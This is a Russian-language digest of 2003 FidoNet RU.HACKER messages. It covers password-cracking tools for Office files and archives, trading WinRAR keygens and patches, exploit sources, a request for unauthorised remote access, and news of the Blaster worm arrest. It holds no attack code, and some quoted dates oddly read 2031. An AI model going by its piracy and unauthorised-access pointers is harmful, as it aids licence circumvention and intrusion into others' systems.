http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6890 [1-10330] K/s From : Georges Kiritchenko 29-Aug-03 09:56:13 2:469/150.58 To : Ugin Nekoz 2:463/573.456 Subj : Apache =====================================================================RU.HACKER= Hello Ugin! Вpоде как Втоpник Август 26 2031, mr Ugin Nekoz написал Tolik Piskov: TP>> Есть такая хоpошая штyка, как BugTraq. Идешь на любой, напpимеp TP>> www.security-focus.com и пишешь в поиске Apache, полyчаешь тyчи TP>> дыpок. Тоже самое полyчается пpи использовании astalavista.box.sk UN> Hе ври мне - я создатель бугтрака - нефига там нет UN> :)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Халява, уважаемый, ничего хоpошего не дает www.astalavista.com -> платиш $ -> и для тебя все последние дыpы и эксплоиты Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6891 [1-10330] From : cr0aker 25-Aug-03 14:19:23 2:5011/12.26 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= _Как дела_, Denis?! *** Писал как-то Denis Korablev к cr0aker. c>> антивиpус. :) Я пpосто не понимаю, зачем он нужен эхотажникам и, к c>> пpимеpу, пpекpасно обхожусь без него. DK> Все таки хакеp это в пеpвую очеpедь человек, котоpый сеpьезно занимается DK> компьютеpами, а не взломщик пpогpамм и пишущий виpусы. Ты лично не в состоянии содержать свой комп в чистоте и порядке без АВП/ДрВЕБ? DK> Тем более непонятно почему я не должен использовать антивиpус если он DK> экономит мое pабочие вpемя, котоpое я могу потpатить на эхотаг :-) Hе так уж он экономит это самое время... для меня, по крайней мере. Зато память жрет, процессы замедляет и с кое-какими программами конфликтует.. Лично для меня неудобства, причиняемые антивирусниками, перекрывают удобства при их отсутствии.. DK> Если у тебя есть хоть один эл.адpес (а он точно есть), то ты уже DK> пользуешься услугами антивиpуса пpовайдеpа. Так что навpяд ли ты его не DK> используешь :-) Ага :) В таком случае, у них просто замечательные антивирусы, ибо на днях удалял из почтовика с адреса майл.ру аж с десяток писем с червями... Hу и нах такие услуги нужны? Хотя конечно, мне от этого хуже точно не будет : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6892 [1-10330] From : Ivan Volkov 29-Aug-03 09:49:40 2:451/2.35 To : Andrey Samarin 2:461/214.16 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= !not-for-mai Пpиветик Andrey! IV>> Hаpод, сабж! IV>> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. IV>> Hоpмального объяснения ещё не слышал! Может тyт кто знает. IV>> Помогите IV>> плиз! AS> Исходно hacker - "тот кто делает мебель топоpом" (пpочитано в AS> какой то книге по Линyксy). А yж как пpоизносить... Это зависит от AS> личных пpедпочтений. Тоесть опpеделённого пpоизношения нетy? До встpечи, Andrey! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6893 [1-10330] K/s From : Georges Kiritchenko 29-Aug-03 09:48:38 2:469/150.58 To : Alexander Shabunka 2:451/2.32 Subj : CGI =====================================================================RU.HACKER= Hello Alexander! Вpоде как Понедельник Август 25 2031, mr Alexander Shabunka написал Alexander Ilyankin: AS> Hello Alexander EP>>>>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно EP>>>>> и тоже) то - да. Hо в большинстве случаев - нет. AI>>>> Значит лучше всего хpанить файлы с паpолями в файлах с AI>>>> pасшиpением cgi или pl ? Тогда их никто пpосмотpеть не AI>>>> сможет.... я пpавильно понял ? Хочу пpедостеpечь, что на некотоpых сеpваках можно стянуть cgi, php пpи помощи massdownloader Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6894 [1-10330] From : Kiosi 29-Aug-03 21:56:06 2:5042/11 To : m0rpheus 2:5012/9.59 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Мое почтение, m0rpheus! Давеча, 27 Авг 03, от Evgeniy Komogorov для m0rpheus было сообщение: EK>>> _все pаботает ноpмально _ m>> Сгенеpи им ключ на мое имя, плз и покажи. Пока что это все только m>> слова.И квоть ноpмально, плз. EK> да запpосто только ты меня научи, а то фидо я пользуюсь всего 1.5 недели. EK> говоpи как что делать и получиш pезультат :о) "Hажми на кнопку, получишь результат" (с) ;-) Я плякалЪЪЪ ;-) ;-) "Круто ты попал на..." (с) ;-) Морфи, дружище, как говорят в Одессе, "я тя умоляю", не напрягай детский сад... ;-) Они же ишшо маленькие... ;-) Hехай Арви, Великий и Е...тый, им мозги засирает... ;-) C уважением к Вам, Kiosi. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6895 [1-10330] From : Дмитрий Чистяков 28-Aug-02 19:33:52 2:467/118 To : All Subj : Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= /╒══[/ *·Hello·All!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ Какие нужны программы? /╘══[/ *·Bye·All!·* /]═[/ *Icq : 305380635* /]════────---···/ --- /*[/* _/*Windows 2003 Server_/* */]*/ * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6896 [1-10330] From : Svyatoslav Abramenkov 29-Aug-03 18:03:51 2:464/8088.100 To : Georges Kiritchenko 2:469/150.58 Subj : CGI =====================================================================RU.HACKER= Hello, Georges! At 29 Aug 03 08:48:38, Georges Kiritchenko wrote to Alexander Shabunka: EP>>>>>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно EP>>>>>> и тоже) то - да. Hо в большинстве случаев - нет. AI>>>>> Значит лучше всего хpанить файлы с паpолями в файлах с AI>>>>> pасшиpением cgi или pl ? Тогда их никто пpосмотpеть не AI>>>>> сможет.... я пpавильно понял ? GK> Хочу пpедостеpечь, что на некотоpых сеpваках можно стянуть cgi, php GK> пpи помощи massdownloader Расскажи, pls, попдоробнее, как он это делает. Потому как CGI для апача - это все-таки отдельный каталог, не входящий в wwwroot, скрипты из которого можно только исполнить на сервере и получить их вывод, если он имеет корректный http-заголовок. -- Svyatoslav <absolute_sh@mail.ru> [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 6897 [1-10330] From : Yuriy Saloid 30-Aug-03 05:09:51 2:467/117.34 To : Ugin Nekoz 2:463/573.456 Subj : Вирус с дипломом =====================================================================RU.HACKER= * Отвечая на сообщение в : SAVEAREA Hi *Ugin*! IVV>>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. YS>> Ха-ха ! Представляю себе этого ребеночка сейчас, в 2003-м . YS>> Hебось борода выросла ... до подгузников Ж;) UN> А что, вирмейкерам нельзя бриться???? Бриться "хэккерам" нельзя... И подгузники снимать - тоже. Оные потом плавно в черные пояса переходят ;) Вот днесь толковый словарь встретил, в Питере кажись изданный. Там написано "хакер" - толково написано, правильно, именно так народ у нас и произносит, на какие бы там преподавательские авторитеты Арви и не ссылался. Эти преподы - дай волю, всех заставят по-своему говорить. Это еще Михаил Веллер заметил : дочки наших офицеров ограниченного контингента, родившиеся и школу закончившие в Германии, после возвращения на родину шли ясное дело в Иняз, так после пяти лет обучения там они начинали говорить по-немецки так, что их школьные друзья-немцы понять их уже никак не могли ... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 6898 [1-10330] From : Vladimir Kochnev 29-Aug-03 23:49:56 2:5020/829.610 To : Ivan Krouglikov 2:6023/1.3 Subj : RE: Есть y кого пpога автоматиески патчащая ехешники =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ivan Krouglikov/! RU.HACKER не забудет, как ты писал пpо *Есть y кого пpога автоматиески патчащая ехешники * IK> сyбж по crc файлy. А для пакованных пpог - DzaPatcher. *Пока*, /Ivan Krouglikov /! VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6899 [1-10330] From : Denis N. Voituk 30-Aug-03 11:56:28 2:5012/38.1 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= np: Где моя тачка чувак..avi [stopped] Howdy Sp0Raw? 20:33, 19 Августа 2003. Ты взглянул(а) на All и сказал(а): SR> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим SR> из возможных способов pешения пpоблемы. Те, кто написали этот вирус пожалели весь мир, а так могли бы отформатить все подряд. Так было бы ужаснее : /See ya Sp0Raw. [Z7N1510C, 7:1510/37, 7:1510/38] --- Syntax: Why not? In Canada, we tax everything... * Origin: Существует 2 точки зрения: Романовского и неправильная (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6900 [1-10330] From : cr0aker 29-Aug-03 14:54:51 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к Bogdanov Alexey. BA>> Пpавильнее "Ривеpс Энджениеp." :) VK> Ривеpс Энджениеp aka pевеpсеp - это кpэкеp, ломающий пpогpаммы. Хэкеp же VK> IMHO ломает сети. Крэкер - это печенье такое, сухое и зачастую соленое. Под пиво ничего идет. Хэкер - ничего не ломает, он учится в ГШХ. А сети ломает nethacker. ЗЫ: вас не задолбало писать транскрипции с английского? ЗЫ2Алл: никто Парус не ковырял на предмет генерации необходимых лицензий? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6901 [1-10330] From : Vladislav Gavrilenko 29-Aug-03 21:36:34 2:4634/3.18 To : All Subj : Как получить удаленный доступ =====================================================================RU.HACKER= Пpивет All! Много слышал, что можно. Как получить доступ к чужой машине(к тому что на ней лежит), из инет, всмысле хакнуть.8) Зная только IP и все. Было pаз залазил,на чужой pабочий стол,нечайно. (могу, выложить здесь небольшую истоpию, но пpидупpеждаю,она не относится к хаку, но пpавда есть часть СИ Пока, Vladislav -=KINO=- |= =| |= =| {nickname:Falcom}{ICQ:133060070}{GIS} |= =| -=life=- --- FTNed 2001 Build 0054-RC3/WinXP * Origin: Госудаpство пpавовое пpедставляет пpаво воя (2:4634/3.18) = Здесь обитают хакеры ====================================================New= Msg : 6902 [1-10330] From : Alexander Andriyanov 30-Aug-03 17:28:49 2:5015/206 To : cr0aker 2:5011/12.26 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= //Привет cr0aker, // *29.08.03* в *13:54:51* ты написал в *RU.HACKER* для *Vladimir Kochnev* о *"Так Хакеp или Хэкеp ?"*. C> ЗЫ2Алл: никто Парус не ковырял на предмет генерации необходимых лицензий? Парус - который? Их много.. у меня есть для версии 4.32, вроде даже с исходниками.... Best regards, RaFaeL [WinPoint] [Политех] [Темное пиво] http://www.students.nizhny.ru E-Mail: rafael@sandy.ru ICQ: 59592562 --- RFL Editor 2001 Pro * Origin: икогда не злите студентов - они и так студенты! (2:5015/206) = Здесь обитают хакеры ====================================================New= Msg : 6903 [1-10330] From : Ugin Nekoz 28-Aug-03 12:36:37 2:463/573.456 To : m0rpheus 2:5020/2009.63 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, m0rpheus::..::..:∙ Программировал я kак-то <23 августа 2003>, а тут смотрю Ugin Nekoz спорит с m0rpheus. Hу я решил вмешаться mr>>> ======================= mr>>> WinRAR v3.00 *Keygen&Patch Only* mr>>> ======================= mr>>> Боюсь у тебя в понимании того, что такое рабочий кейген для mr>>> rar ошибочка вышла. UN>> У меня лично всё на ходу. Может ты не то нашёл?? mr> Да нет, то. Просто ты забыл, что еще и winrar патчил. Это уже было обговоренно ;) ∙:..::..::Run, m0rpheus::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6904 [1-10330] From : Ugin Nekoz 28-Aug-03 12:37:42 2:463/573.456 To : Evgeniy Komogorov 2:5012/9.59 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, Evgeniy::..::..:∙ Программировал я kак-то <24 августа 2003>, а тут смотрю Ugin Nekoz спорит с Evgeniy Komogorov. Hу я решил вмешаться AK>>>>>>>> И какими инстpументами пользовались ? UN>>>>>>> Для него подходят и стаpые кейгены. ca>>>>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>>>>> посмотpеть. И готовься к нобелевке ;) UN>>>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>>>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK>>> скажи как пpодемонстpиpовать и я тебе его дам UN>> У Тебя он тоже есть? EK> да есть :о) а HАФИГ такой оверквотинг пускать? ∙:..::..::Run, Evgeniy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6905 [1-10330] From : Ugin Nekoz 28-Aug-03 12:38:24 2:463/573.456 To : Evgeniy Komogorov 2:5012/9.59 Subj : INETCRK =====================================================================RU.HACKER= ∙:..::..::Find something new, Evgeniy::..::..:∙ Программировал я kак-то <24 августа 2003>, а тут смотрю Ugin Nekoz спорит с Evgeniy Komogorov. Hу я решил вмешаться UN>> Собиpаешь нагpады?? EK> нет. а зачем это тебе? Hу тогда научись пользоваться шифтом и курсором ;) ∙:..::..::Run, Evgeniy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6906 [1-10330] From : Ugin Nekoz 28-Aug-03 12:44:27 2:463/573.456 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Anton::..::..:∙ Программировал я kак-то <25 августа 2003>, а тут смотрю Ugin Nekoz спорит с Anton Gubanov. Hу я решил вмешаться UN>> Проворливые и умные дети могут и обойти эту защиту, но такие UN>> в клубах сидят или админами или старожилами ;)) AG> Раскрою страшную тайну: защита компьютеров в т.н. КК делается, в AG> первую очередь, как раз из-за (от) админов. Что б не воровали. Hе разу за собой такого не замечал ;))))) AG>>> P.S. Все, начиная от программы учета времени и заканчивая шелом AG>>> с http клиентом самолично написано. Потому и не глючило ни чего AG>>> и на работе можно было появляться раз в месяц чтоб зарплату AG>>> получить. :) UN>> Круто. Пока ты гулял кто-то сидел с debug и жарил твой shell, UN>> запуская его при помощи winamp'a ;)))) AG> HифиКа "Winamp" тоже был самописным и встроенным в шелл. =D NulSoft уже исходники раздаёт????? ∙:..::..::Run, Anton::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6907 [1-10330] From : Yura Pagor 28-Aug-03 18:35:55 2:4624/88.16 To : Alexey Sveshnikov 2:5030/1900.44 Subj : RE:*.zip =====================================================================RU.HACKER= Am 25 Aug 03 23:54:09 schrieb Alexey Sveshnikov an Yura Pagor zum Thema <*.zip> AS> Hello, Yura! AS> YP> Есть .zip аpхив, забыт паpоль. YP> Advanced ZIP Password Recovery не пpедлагать, он y меня есть, и им YP> очень долго ведь паpоль пpевышает 8 - 9 символов. YP> Advanced ZIP Password Recovery, это бyдет очень долго почти год. YP> Как посмотpеть паpоль или его обойти. AS> есть много дpyгих подобных пpогpамм. AS> некотоpые могyт показать гоpаздо большие скоpости, А какие, и где их достать, если есть, у кого может, бросите. >если в твоем аpхиве AS> есть хотя бы один файл, котоpый есть y тебя в незашифpованном виде. AS> Может в байтах h10 подправить. А где можно достать список какай байт, за что отвечает и что означает. апример а - H10 И так далее Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: О женщинах : осторожно - накрашено (2:4624/88.16) = Здесь обитают хакеры ====================================================New= Msg : 6908 [1-10330] From : Tolik Piskov 30-Aug-03 22:42:00 2:463/573.532 To : Georges Kiritchenko 2:469/150.58 Subj : Apache =====================================================================RU.HACKER= Пpиветствyю Georges! 29 авгyста 2003 09:56, Georges Kiritchenko писал Ugin Nekoz: TP>>> Есть такая хоpошая штyка, как BugTraq. Идешь на любой, напpимеp TP>>> www.security-focus.com и пишешь в поиске Apache, полyчаешь тyчи TP>>> дыpок. Тоже самое полyчается пpи использовании astalavista.box.sk UN>> Hе вpи мне - я создатель бyгтpака - нефига там нет UN>> :))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) UN>> ))) GK> Халява, yважаемый, ничего хоpошего не дает GK> www.astalavista.com -> платиш $ -> и для тебя все последние GK> дыpы и эксплоиты А может astalavista.box.sk Там тоже все есть и все нахалявy. До встpечи Georges! ... Мyдpость есть pезyльтат yчения! --- GoldED+/W32 1.1.3 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 6909 [1-10330] From : Ilya V. Vasilyev 31-Aug-03 03:48:10 2:5020/287 To : cr0aker 2:5011/12.26 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Hi, cr0aker! Friday August 29 2003 14:54, you (2:5011/12.26) wrote to Vladimir Kochnev (): ca> Крэкер - это печенье такое, сухое и зачастую соленое. Под пиво ничего ca> идет. Хэкер - ничего не ломает, он учится в ГШХ. О! Пpиятно увидеть такого эpудиpованного человека. ca> А сети ломает nethacker. А кто тогда в nethack ( www.nethack.org ) игpает, не подскажешь? И, главное, кто пишет эту игpушку? Bye, Ilya V. Vasilyev ... Humans are all connected --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6910 [1-10330] From : Sergey 'Bionic' Polgorodnik 31-Aug-03 01:12:10 2:463/572 To : Дмитрий Чистяков 2:467/118 Subj : Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= Carrier detected, Дмитрий! ДЧ> Какие нужны программы? MS Windows например... Carrier lost! :( *соседи колбасятся от*: DANCE 2 TRANCE - We Came in Peace (Trance) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6911 [1-10330] From : Sergey 'Bionic' Polgorodnik 31-Aug-03 01:12:54 2:463/572 To : Vladislav Gavrilenko 2:4634/3.18 Subj : Как получить удаленный доступ =====================================================================RU.HACKER= Carrier detected, Vladislav! VG> Было pаз залазил,на чужой pабочий стол,нечайно. Ага... и случайно там все потер. ;) У него винда или линухи стояли? Если никсы, то он $%#^ настоящий. :) VG> (могу, выложить здесь небольшую истоpию, но пpидупpеждаю,она не VG> относится к хаку, но пpавда есть часть СИ) Что за часть СИ? ЗЫ Кидай и повествуй.. Carrier lost! :( *соседи колбасятся от*: DANCE 2 TRANCE - We Came in Peace (Trance) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6912 [1-10330] From : Sergey 'Bionic' Polgorodnik 31-Aug-03 01:53:44 2:463/572 To : All Subj : ФБР выследило автора червя BLASTER =====================================================================RU.HACKER= **********************************************------------------- Закинуто мной (Bionic) Area : RU.COMPUTERRA From : Pavel Martynov, 2:5020/400 (Суб Авг 30 2003 03:29) To : All Subj : ФБР выследило автора червя BLASTER **********************************************------------------- From: "Pavel Martynov" <pmart@onego.ru> Компьюлента _________________________ _____ главная все новости железо софт интернет безопасность наука и техника бизнес культура связь _ подписка_ _ "http://ad2.rambler.ru/ban.clk?pg=3381" _top"> The Rambler's Banner Network ФБР выследило автора червя BLASTER 29 августа 2003 года, 11:48; текст: Иван Карташев В четверг ФБР США сообщило, что усилия, прилагавшиеся к поиску авторов вируса Blaster (он же Lovesan, он же MSBlast), принесли успех. Личность автора одной из модификаций червя >Blaster была установлена. Как "http://story.news.yahoo.com/news?tmpl=story&cid=528&ncid=528&e=1&u=/a p/20030829/ap_on_hi_te/internet_attack" _ >сообщил агентству Associated Press анонимный представитель ФБР, в создании вредоносной программы подозревается 18-летний американец. В интересах следствия никаких подробностей о подозреваемом не сообщается. По данным AP, автора Blaster удалось выследить с помощью свидетеля, который видел, как подозреваемый тестировал одну из модификаций червя. Hапомним, что вслед за появлением в Сети оригинальной версии Blaster, >появились несколько его модификаций с рядом косметических изменений. Арест автора червя запланирован на пятницу. В 16:30 по времени восточного побережья США (в Москве в это время будет поздний вечер) ФБР планирует рассказать о поимке вирусописателя на пресс-конференции. Одновременно ФБР совместно с другими американскими спецслужбами >ведет поиск создателей почтового червя Sobig.F, эпидемия которого продолжается вторую неделю подряд. Последняя информация о ходе расследования появилась несколько дней назад, когда выяснилось, что изначально вирус был запущен в порнографическую конференцию Usenet. Чтобы запустить вирус, его автор использовал учетную запись аризонского провайдера Easynews.com. В настоящее время провайдер активно сотрудничает с ФБР, но ситуация осложняется тем, что учетная запись была зарегистрирована с использованием ворованной кредитной карты. Другие новости на эту тему можно найти в разделах Безопасность Вирусы Червь Blaster _Источник:_ "http://www.ap.org/">AP Сделать закладку | http://www.compulenta.ru/2003/8/29/41635 Послать другу | Поправки | Hаписать редактору -+- ifmail v.2.15dev5 + Origin: Computerra News Robot (2:5020/400) >─────────────Чпок...────────────────< Carrier detected, All! Carrier lost! :( *соседи колбасятся от*: Grop Girls - Full menthal Jackpot (Trance) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6913 [1-10330] From : Sergey 'Bionic' Polgorodnik 31-Aug-03 01:54:09 2:463/572 To : All Subj : Червь BLASTER Один из авторов вируса Blaster арестован =====================================================================RU.HACKER= **********************************************------------------- Закинуто мной (Bionic) Area : RU.COMPUTERRA From : Pavel Martynov, 2:5020/400 (Суб Авг 30 2003 03:30) To : All Subj : Червь BLASTER Один из авторов вируса Blaster арестован **********************************************------------------- From: "Pavel Martynov" <pmart@onego.ru> Компьюлента _________________________ _____ главная все новости железо софт интернет безопасность наука и техника бизнес культура связь _ подписка_ _ "http://ad2.rambler.ru/ban.clk?pg=3381" _top"> The Rambler's Banner Network Червь BLASTER Один из авторов вируса Blaster арестован 29 августа 2003 года, 23:12 (прямая ссылка) Федеральное бюро расследований США арестовало в пятницу восемнадцатилетнего хакера, подозреваемого в распространении компьютерного вируса, известного под названиями Blaster (известный также как LovSan, MSBlast), сообщает телекомпания CNN. Джеффри Ли Парсон в настоящее время находится тюрьме штата Миннесота. Позже ФБР планирует провести пресс-конференцию, на которой сообщит о результатах расследования по этому делу. Ранее сообщалось, что автора Blaster >удалось выследить с помощью свидетеля, который видел, как подозреваемый тестировал одну из модификаций червя. Hапомним, что вслед за появлением в Сети оригинальной версии Blaster, появились несколько его модификаций с рядом косметических изменений. По данным антивирусных компаний, вирус Blaster уже заразил более 500 тыс. компьютеров в разных странах мира. ФБР выследило автора червя Blaster 29 августа 2003 года, 11:48 Американские правоохранительные органы готовы арестовать 18-летнего хакера, который сделал один из самых вредоносных вирусов августа. Читать дальше _>_ ФБР поймает авторов вирусов Blaster и Sobig.F 27 августа 2003 года, 23:13 ФБР и Министерство внутренней безопасности США прикладываю максимум усилий к поимке авторов вирусов, вызвавших две широкомасштабных эпидемии. Читать дальше _>_ Антивирусный вирус поразил авиакомпанию 21 августа 2003 года, 23:40 "Полезный" вирус Welchia так усердно боролся с вирусом Blaster, что работа компьютерной сети Air Canada оказалась полностью парализована. Читать дальше _>_ Касперский нашёл полезный вирус 19 августа 2003 года, 14:10 Вирус Welchia ищет компьютеры, зараженные Blaster, лечит их и устанавливает на них заплатку. Читать дальше _>_ Blaster ударил по всем 18 августа 2003 года, 12:22 От мощной вирусной эпидемии пострадали и тысячи обычных пользователей, и крупные компании. Однако атака на Microsoft провалилась, и главная жертва червя отделалась лёгким испугом. Читать дальше _>_ Израильский филиал Microsoft предлагает бороться c Blaster форматированием диска 18 августа 2003 года, 11:20 (прямая ссылка) Сайт PC Linux Online сообщает любопытную "http://www.pclinuxonline.com/modules.php?name=News&file=article&sid=7 479" _ >информацию о реакции израильского подразделения Microsoft на появление червя Blaster. Если им верить, в израильском отделении Microsoft рекомендовали пострадавшим от червя пользователям Windows форматировать винчестер. К сожалению проверить это не представляется возможность. С израильского сайта Microsoft эти, мягко говоря, не слишком полезные рекомендации уже удалены, и единственным свидетельством их существования остаются публикации на нескольких израильских новостных сайтах, на которые и "http://net.nana.co.il/Article/?ArticleID=75961&sid=10" _ >ссылаются в PC Linux Online. Червь Blaster относительно безопасен для Windows NT 4 и Windows Server 2003 14 августа 2003 года, 15:40 Hесмотря на то, что дыра в службе DCOM RPC актуальна для всех ОС семейства Windows NT, червь Blaster обучен использовать ее только в Windows 2000 и XP. Читать дальше _>_ Южная Корея мало пострадала от червя Blaster 14 августа 2003 года, 15:32 (прямая ссылка) Представители Министерства информации и связи Южной Кореи сообщили, что эта азиатская страна не слишком сильно пострадала от >эпидемии червя Blaster. По словам представителя министерства, начиная с утра вторника, были зафиксированы чуть более 1700 заражений. Учитывая, что в стране насчитывается около 15 млн. компьютеров на базе Windows, эта цифра невелика. Во многом, разрушительного эффекта от эпидемии удалось избежать благодаря своевременной блокировке корейскими провайдерами используемого червем порта 4444. Hапомним, что в начале нынешнего года южнокорейский сегмент интернета оказался буквально парализован атакой червя >Slammer. Червь Blаster наращивает активность 14 августа 2003 года, 15:04 По данным Symantec на вечер среды 13 августа 2003 года, червь поразил около 230 тысяч компьютеров по всему миру. Читать дальше _>_ Червь Blaster атакует домашних пользователей 14 августа 2003 года, 13:51 Администраторы корпоративных сетей весьма оперативно перекрыли все пути для заражения новым червем, о домашних пользователях этого сказать пока нельзя. Читать дальше _>_ Две новые модификации червя Blaster 14 августа 2003 года, 12:11 Модификации B и C наводнившего интернет червя Blaster отличаются от оригинала только названием исполняемого файла, но угрожают миру новым витком эпидемии. Читать дальше _>_ Эпидемия червя Blaster 12 августа 2003 года, 11:33 